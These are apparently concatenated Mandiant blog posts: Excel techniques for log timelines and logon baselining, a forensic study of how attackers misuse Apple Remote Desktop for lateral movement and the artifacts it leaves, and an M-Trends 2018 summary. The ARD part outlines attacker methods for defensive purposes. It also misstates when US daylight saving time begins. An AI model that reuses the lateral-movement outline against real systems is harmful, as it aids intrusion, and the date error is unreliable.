When we know which time zone our log sources are in, we can adjust the timestamps accordingly to reflect UTC. In this case, we confirmed through testing that the application logins and web logs are recorded in EDT, which is four hours behind UTC, or “UTC-4”. To change these to UTC time, we just need to add four hours to the time. The Excel TIME function makes this easy. We can just add a column to the existing tables, and in the first cell we type “=A2+TIME(4,0,0)”. Breaking this down:

  • =A2
    • Reference cell A2 (in this case our EDT timestamp). Note this is not an absolute reference, so we can use this formula for the rest of the rows.
  • +TIME
    • This tells Excel to take the value of the data in cell A2 as a “time” value type and add the following amount of time to it:
  • (4,0,0)
    • The TIME function in this instance requires three values, which are, from left to right: hours, minutes, seconds. In this example, we are adding 4 hours, 0 minutes, and 0 seconds.

Now we have a formula that takes the EDT timestamp and adds four hours to it to make it UTC. Then we can replicate this formula for the rest of the table. The end result looks like this:

When we have all of our logs in the same time zone, we are ready to compile our master timeline. Taking the UTC timestamps and the summary events we made, our new, accurate timeline looks like this:

Now we can clearly see suspicious emails sent to (fictional) employees Austin and Dave. A few minutes later, Austin’s account logs into the HR application and adds a new bank account. After this, we see the same email sent to Jake. Soon after this, Jake’s account logs into the HR application and adds the same bank account information as Austin’s. Converting all our data sources to the same time zone with Excel allowed us to quickly link these events together and easily identify what the attacker did. Additionally, it provided us with more indicators, such as the known-bad bank account number to search for in the rest of the logs.

Pro Tip: Be sure to account for log data spanning over changes in UTC offset due to regional events such as daylight savings or summer seasons. For example, local time zone adjustments will need to change for logs in United States Eastern Time from Virginia, USA from +TIME(5,0,0) to +TIME(4,0,0) the first weekend in March every year and back from +TIME(4,0,0) to +TIME(5,0,0) the first weekend in November to account for daylight and standard shifts.

CountIf for Log Baselining

When reviewing logs that record authentication in the form of a user account and timestamp, we can use COUNTIF to establish simple baselines to identify those user accounts with inconsistent activity.  

In the example of user logons that follows, we'll use the formula "=COUNTIF($B$2:$B$25,B2)" to establish a historical baseline. Here is a breakdown of the parameters for this COUNTIF formula located in C2 in our example: 

  • COUNTIF 
    • This Excel formula counts how many times a value exists in a range of cells. 
  • $B$2:$B$25 
    • This is the entire range of all cells, B2 through B25, that we want to use as a range to search for a specific value. Note the use of "$" to ensure that the start and end of the range are an absolute reference and are not automatically updated by Excel if we copy this formula to other cells. 
  • B2 
    • This is the cell that contains the value we want to search for and count occurrences of in our range of $B$2:$B$25. Note that this parameter is not an absolute reference with a preceding "$". This allows us to fill the formula down through all rows and ensure that we are counting the applicable user name. 

To summarize, this formula will search the username column of all logon data and count how many times the user of each logon has logged on in total across all data points. 

When most user accounts log on regularly, a compromised account being used to logon for the first time may clearly stand out when reviewing total log on counts. If we have a specific time frame in mind, it may be helpful to know which accounts first logged on during that time.  

The COUNTIF formula can help track accounts through time to identify their first log on which can help identify rarely used credentials that were abused for a limited time frame.  

We'll start with the formula "=COUNTIF($B$2:$B2,B2)" in cell D3. Here is a breakdown of the parameters  for this COUNTIF formula. Note that the use of "$" for absolute referencing is slightly different for the range used, and that is an importance nuance: 

  • COUNTIF 
    • This Excel formula counts how many times a value exists in a range of cells. 
  • $B$2:$B2 
    • This is the range of cells, B2 through B2, that we want to start with. Since we want to increase our range as we go through the rows of the log data, the ending cell row number (2 in this example) is not made absolute. As we fill this formula down through the rest of our log data, it will automatically expand the range to include the current log record and all previous logs. 
  • B2 
    • This cell contains the value we want to search for and provides a count of occurrences found in our defined range. Note that this parameter B2 is not an absolute reference with a preceding "$". This allows us to fill the formula down through all rows and ensure that we are counting the applicable user name. 

To summarize, this formula will search the username column of all logon data before and including the current log and count how many times the user of each logon has logged on up to that point in time. 

The following example illustrates how Excel automatically updated the range for D15 to $B$2:$B15 using the fill handle.  


To help visualize a large data set, let's add color scale conditional formatting to each row individually. To do so: 

  1. Select only the cells we want to compare with the color scale (such as D2 to D25). 
  2. On the Home menu, click the Conditional Formatting button in the Styles area. 
  3. Click Color Scales. 
  4. Click the type of color scale we would like to use. 

The following examples set the lowest values to red and the highest values to green. We can see how: 

  • Users with lower authentication counts contrast against users with more authentications. 
  • The first authentication times of users stand out in red. 

Whichever colors are used, be careful not to assume that one color, such as green, implies safety and another color, such as red, implies maliciousness.

Conclusion

The techniques described in this post are just a few ways to utilize Excel to perform analysis on arbitrary data. While these techniques may not leverage some of the more powerful features of Excel, as with any variety of skill set, mastering the fundamentals enables us to perform at a higher level. Employing fundamental Excel analysis techniques can empower an investigator to work through analysis of any presented data type as efficiently as possible.

Living off the Orchard: Leveraging Apple Remote Desktop for Good and Evil

Attackers often make their lives easier by relying on pre-existing operating system and third party applications in an enterprise environment. Leveraging these applications assists them with blending in with normal network activity and removes the need to develop or bring their own malware. This tactic is often referred to as Living Off The Land. But what about when that land is an Apple orchard?

In recent enterprise macOS investigations, FireEye Mandiant identified the Apple Remote Desktop application as a lateral movement vector and as a source for valuable forensic artifacts.

Apple Remote Desktop (ARD) was first released in 2002 and is Apple’s “desktop management system for software distribution, asset management, and remote assistance”. An ARD deployment consists of administrator and client machines. While the administrator app must be downloaded from the macOS App Store, the client application is included natively as part of macOS. Client systems must be added to the client list on an administrator system manually, or they can be discovered via Bonjour if they are in the same local subnet as the administrator system. In a typical enterprise environment deployment, managers would be the ARD administrators and have the ability to view, manage, and remotely control their managed personnel’s workstations via ARD.

Lateral Movement

Mandiant has observed attackers using the ARD screen sharing function to move laterally between systems. If remote desktop was not enabled on a target system, Mandiant observed attackers connecting to systems via SSH and executing a kickstart command to enable remote desktop management. This allowed remote desktop access to the target systems. The following is an example from the macOS Unified Log showing a kickstart command used by an attacker to enable remote desktop access for all users with all privileges:


Figure 1: Kickstart command example

During an investigation, you can use a few different artifacts to trace this activity. Execution of the kickstart command modifies the contents of the configuration file /Library/Application Support/Apple/Remote Desktop/RemoteManagement.launchd to contain the string “enabled”. SSH login activity can be found in the Apple System Logs or Audit Logs. Execution of the kickstart command can be found in the Unified Logs, as seen in Figure 1.

An ARD administrator has a substantial amount of power available to them, similar to compromising an administrator account in a Windows environment. By compromising an account that has access to ARD administrator system, an attacker can perform any of the following actions:

  • Remotely control VNC-enabled machines, including in “Curtain Mode” which hides the remote actions from the local workstation’s screen
  • Transfer files
  • Remotely shut down or restart multiple machines simultaneously
  • Schedule tasks
  • Execute AppleScript and UNIX shell scripts

Apple’s ARD web page and the ARD help page contain more details about ARD’s capabilities.

ARD Reporting as a Forensic Force Multiplier

Along with remote system control functionality, Apple Remote Desktop’s asset management capabilities include conducting remote Spotlight searches, file searching, generating software version information reports, and more importantly, generating application usage and user history reports. The reporting process generally follows these steps:

  1. Client systems compute reports and cache the data locally before transferring them to the administrator system (the default policy is to begin this at 12:00 AM local time, daily).
  2. Data received from clients is cached on the administrator system. Alternatively, a macOS system with the administrator version of ARD installed can be set up as a “Task Server” for a centralized collection option.
  3. Cached data is written to SQLite database on the administrator system

The cached data is stored in various subdirectories under the /private/var/db/RemoteManagement/ parent directory. The directory has the following structure:


Figure 2: /private/var/db/RemoteManagement/ directory structure

This directory structure is present on all systems, but which files exist in which directories depends on whether the system is an ARD client or administrator system.

Artifacts from ARD Client Systems

There is one directory that is the focus for investigations on client systems: /private/var/db/RemoteManagement/caches/. This directory contains the following files, which are the local client data cache that is periodically reported to the administrator system. Do note, however, that these files are routinely deleted by the system, so they may not be present. These files are typically deleted from the client system once they are transmitted to the administrator system. Once transmitted, the data is stored on the administrator system.

File

Description

AppUsage.plist

plist file containing application usage data

AppUsage.tmp

Binary plist file containing application usage data, often the same as or less thorough than AppUsage.plist

asp.cache

Binary plist of system information

filesystem.cache

Database containing an index of the entire file system, including users and groups

sysinfo.cache

Binary plist containing system information, some of which is also present in asp.cache

UserAcct.tmp

Binary plist containing user login activity

Table 1: ARD cache files

In our experience, the most useful information available from these files is application usage and user activity.

Application Usage

The RemoteManagement/caches/AppUsage.plist file contains one key per application, where each key is the full path of the application, such as file:///Applications/Calculator.app/.

Each application key contains a dictionary that includes a “runData” array and a “Name” string, which is the friendly name of the application, such as “Calculator”, as seen in Figure 3.


Figure 3: AppUsage.plist structure

Each “runData” array contains at least one dictionary consisting of the following keys and values:

Key

Value Format

Description

wasQuit

Boolean: true or false

Indicator of whether or not the application was quit prior to the last report time. This field may not exist if the value is not “true”.

Frontmost

Number of seconds

Total duration which the application was “frontmost” on the screen

Launched

macOS absolute timestamp

Time the application was launched

runLength

Number of seconds

Duration the application was run

username

String

User who launched the application

Table 2: AppUsage.plist runData keys and values

Of the two application usage cache artifacts, RemoteManagement/caches/AppUsage.plist usually contains the same or more content than RemoteManagement/caches/AppUsage.tmp.

User Activity

The RemoteManagement/caches/UserAcct.tmp file is a binary plist that contains user activity that can be correlated with other artifacts on a macOS systems, such as the Apple System Logs or Audit Logs. The file contains keys with the short name of each user logged on the system.

Each key contains a dictionary that includes a “uid” string with the user’s UID, and an array for each login type: console, tty, or SSH. Each login-type array contains at least one dictionary consisting of the following keys and values:

Key

Value Format

Description

inTime

macOS absolute timestamp

Time the user logged in

outTime

macOS absolute timestamp

Time the user logged out

host

String

Originating host for remote login. This field has been observed to not be consistently present.

Table 3: UserAcct.tmp keys and values

Artifacts From ARD Administrator Systems

The data outlined in Table 1 is reported to the administrator system daily. The files are then stored in the RemoteManagement/ClientCaches/ directory. Each file is renamed to the MAC address of the reporting system and placed into the appropriate subdirectory, as seen in Table 4. The subdirectories contain the following:

Subdirectory

Data Contained in Each File

ApplicationUsage/

AppUsage.plist files

SoftwareInfo/

Filesystem.cache files

SystemInfo/

Sysinfo.cache files

UserAccounting/

UserAcct.tmp files

Table 4: /private/var/db/RemoteManagement/ClientCaches/ subdirectories

Additionally, there is a plist file, RemoteManagement/ClientCaches/cacheAccess.plist that contains keys of MAC addresses with values of more MAC addresses. The purpose and context for this file has yet to be determined.

The Gold Mine

All the aforementioned data, with the exception of the filesystem.cache files, is added to the main SQLite database RemoteManagement/RMDB/rmdb.sqlite3 (“RMDB”). The RMDB exists on all ARD systems but is only populated on the administrator system. It houses a wealth of information about the systems in the ARD network over a significant timespan. Mandiant has observed data for application usage timestamps from over a year prior to when we acquired a database on a live system.

The RMDB file contains five tables: ApplicationName, ApplicationUsage, PropertyNameMap, SystemInformation, and UserUsage. The following sections detail each table within the database:

ApplicationName

This table is an index for the applications on each system, where each application is assigned an item sequence number (“ItemSeq”) per system. This data is used for correlation in the ApplicationUsage table.

Column

Value Format

Description

ComputerID

String

Client MAC address, no separators

AppName

String

Friendly application name

AppURL

String

Application URL path (i.e. file:///Applications/Calculator.app)

ItemSeq

Integer

ID number for each application, per ComputerID, used for the AppName table

LastUpdated

macOS absolute timestamp

Last report time of the client

Table 5: ApplicationName table columns

ApplicationUsage

The AppName table is unique in the fact the “Frontmost” and “LaunchTime” values in the table are swapped. The research at the time of this blog post was verified on MacOS 10.14 (Mojave).

Column

Value Format

Description

ComputerID

String

Client MAC address, no separators

FrontMost

macOS absolute timestamp

Application launch time

LaunchTime

Number of seconds to 6 decimal places

Total duration the application was “frontmost” on screen

RunLength

Number of seconds to 6 decimal places

Total duration the application was running

ItemSeq

Integer

ItemSeq number for the respective ComputerID, referenced in the ApplicationName table

LastUpdated

macOS absolute timestamp

Last report time of the client

UserName

String

User who launched the application

RunState

Integer

“1” for “running”, or “0” for “terminated” at the time of the last report

Table 6: ApplicationUsage table columns

PropertyNameMap

This table is used as a reference for the SystemInformation table.

Column

Value Format

Description

ObjectName

String

Various elements of a macOS system, such as Mac_HardDriveElement, Mac_USBDeviceElement, Mac_SystemInfoElement

PropertyName

String

Property names for each element, such as ProductName, ProductID, VendorID, VendorName for Mac_USBDeviceElement

PropertyMapID

Integer

ID number for each property, per element

Table 7: PropertyNameMap table columns

SystemInformation

There is a substantial amount of system information collected in this table. This table can be leveraged to extract USB device information, IP addresses, hostnames, and more, of all the reported client systems.

Column

Value Format

Description

ComputerID

String

Client MAC address, with colon separators

ObjectName

String

Elements of a macOS system outlined in the PropertyNameMap table

PropertyName

String

Properties per element outlined in the PropertyNameMap table

ItemSeq

Integer

ID number for each element, i.e. if there are 4 Mac_USBDeviceElement data sets, each one will have an ItemSeq number, 0-3, to group the properties together

Value

String

Data for the respective property

LastUpdated

yyyy-mm-ddThh:mm:ssZ

24 hour local time, last report time of the client. Example: 2019-08-07T02:11:34Z

Table 8: SystemInformation table columns

UserUsage

This table contains the user login activity for all the reported client systems.

Column

Description of Value

ComputerID

Client MAC address, no separators

LastUpdated

macOS absolute timestamp, last report time of the client

UserName

Short name of the user

LoginType

Console, tty, or ssh

inTime

macOS absolute timestamp, time the user logged in

outTime

macOS absolute timestamp, time the user logged out

Host

Originating host for remote login. This field has been observed to not be consistently present.

Table 9: UserUsage table columns

Filesystem Cache

The RemoteManagement/ClientCaches/filesystem.cache file is a database that indexes the files and directories found on a macOS computer’s file system. Rather than using SQLite like the RMDB, ARD uses a custom database implementation to track this information. Fortunately, the database file format is fairly simple, consisting of a file header, six tables, and entries that point to string values. By interpreting the information in the filesystem cache file, an investigator can recreate the directory structure of an ARD-enable system. Mandiant uses this technique to identify and demonstrate the existence of attacker-created files.

The database header, identified by the magic value “hdix”, contains metadata about the database, such as the total number of indexed folders, files, and symlinks. Pointers from this header lead to the six tables: “main”, “names” (file names), “kinds” (file extensions), “versions” (macOS app bundle version infos), “users”, and “groups”. Entries in the “main” table contain references to entries in the other tables; by walking these references, an investigator can recover full file system paths and metadata.

In practice, the filesystem.cache file may be tens of megabytes in size, tracking dozens or hundreds of thousands of file system entries. Figure 4 shows truncated content of a parsed file system cache file; these entries are for the artifacts discussed in this article!


Figure 4: Screenshot of filesystem.cache contents, listing ARD artifacts

On a macOS system, the program “build_hd_index” traverses the file system and indexes the files and directories into filesystem.cache. Figure 5 shows a portion of the documentation for this tool; as expected, the default output directory is [/private]/var/db/RemoteManagement/caches/.


Figure 5: documentation for build_hd_index

Ironically, internet message board posts going back to at least 2007 complain of the performance impact of this tool. A post by “Anonymous” indicates that “build_hd_index” was designed to support file indexing on OS X Panther (2003), which didn’t have Spotlight. Now, 16 years later, we can exploit these artifacts during an incident response.

Introducing: ARDvark

It was evident that if this artifact exists in a future investigation, leveraging its wealth of data will be critical to identifying attacker activities. In some scenarios, investigators may be able to generate reports directly from an ARD administrator system, but this may not always be the case. If not, then investigators would have to rely on manually acquiring and extracting information from the RMDB file on the ARD administrator system. ARDvark is a tool that extracts all user activity and application usage recorded in the RMDB and outputs the data in an analyst-friendly format.

ARDvark will also process the AppUsage.plist and UserAcct.tmp files found on ARD client systems under /private/var/db/RemoteManagement/caches/. Additionally, ARDvark has the capability to parse the filesystem.cache files to produce a file system listing, as well as all users and groups present on the respective system. Please see the FireEye Github for more information.

Detecting and Preventing ARD Abuse

To detect suspicious ARD usage, organizations can monitor for anomalous modification of the /Library/Application Support/Apple/Remote Desktop/RemoteManagement.launchd file to identify remote desktop access enablement where ARD is not used. Analyzing the Unified Logs for evidence of unexpected kickstart commands during threat hunting missions can uncover suspicious ARD usage as well.

Mitigating ARD abuse is reliant upon the principle of least privilege. Mandiant recommends allowing as few remote control privileges as possible, and only allowing administrator privileges to necessary accounts. Apple provides guidance on setting privileges, and authenticating without using local accounts with ARD in the help page and in the ARD user guide. ARD administrators can then routinely generate reports in the ARD application to ensure no changes are made to administration privilege settings.

A Bushel of Evidence

Application usage artifacts for macOS are few and far between. To date, some of the best artifacts for application usage include CoreAnalytics files and the Spotlight database, but none of these artifacts provide the exact time of execution of all applications. While ARD artifacts are not present across every macOS system, if ARD is deployed in an enterprise environment it may provide some of the most valuable data for investigators which you would not uncover otherwise.

User login activity typically exists in the Apple System Logs and Audit Logs, but short log retention is frequently an issue when the average attacker dwell time in 2018 was 78 days. The RMDB provides a potential source of application usage and user login information that is over a year old, long outliving typical log retention times.

The system information available in the RMDB includes IP addresses, USB device information, and more which may be useful to investigators. Also, the file system cache files that are collected contain an extensive file listing of multiple macOS systems, which allows investigators to identify files or users of interest on other systems without having to collect data from the suspect system directly.

ARD is an excellent example of how remote administration tools provide an attack surface for abuse while simultaneously providing a vast amount of data to help piece together malicious activity, all from a single system. If your organization utilizes ARD, consider reviewing the information available through the reporting functionality during threat hunting and future investigative purposes, as the artifact doesn’t fall far from the tree.

M-Trends 2018

What have incident responders observed and learned from cyber attacks in 2017? Just as in prior years, we have continued to see the cyber security threat landscape evolve. Over the past twelve months we have observed a number of new trends and changes to attacks, but we have also seen how certain trends and predictions from the past have been confirmed or even reconfirmed.

Our 9th edition of M-Trends draws upon the findings of one year of incident response investigations across the globe. This data provides us with insights into the evolution of nation-state sponsored threat actors, new threat groups, and new trends and attacker techniques we have observed during our investigations. We also compare this data to past observations from prior M-Trends reports and continue our tradition of reporting on key metrics and their development over time.

Some of the topics we cover in the 2018 M-Trends report include:

  • How the global median time from compromise to internal discovery has dropped from 80 days in 2016 to 57.5 in 2017.
  • The increase of attacks originating from threat actors sponsored by Iran.
  • Metrics about attacks that have retargeted or even recompromised prior victim organizations, a topic we previously discussed in our 2013 edition of M-Trends.
  • The widening cyber security skills gap and the rising demand for skilled personnel capable of meeting the challenges posed by today’s more sophisticated threat actors.
  • Frequently observed areas of weaknesses in security programs and their relation to security incidents.
  • Observations and lessons we have learned from our red teaming exercises about the effectiveness and gaps of common security controls.

By sharing this report with the security community, we continue our tradition of providing security professionals with insights and knowledge gained from recent breaches. We hope that you find this report useful in your work to strengthen your security posture and defend against the ever evolving threats.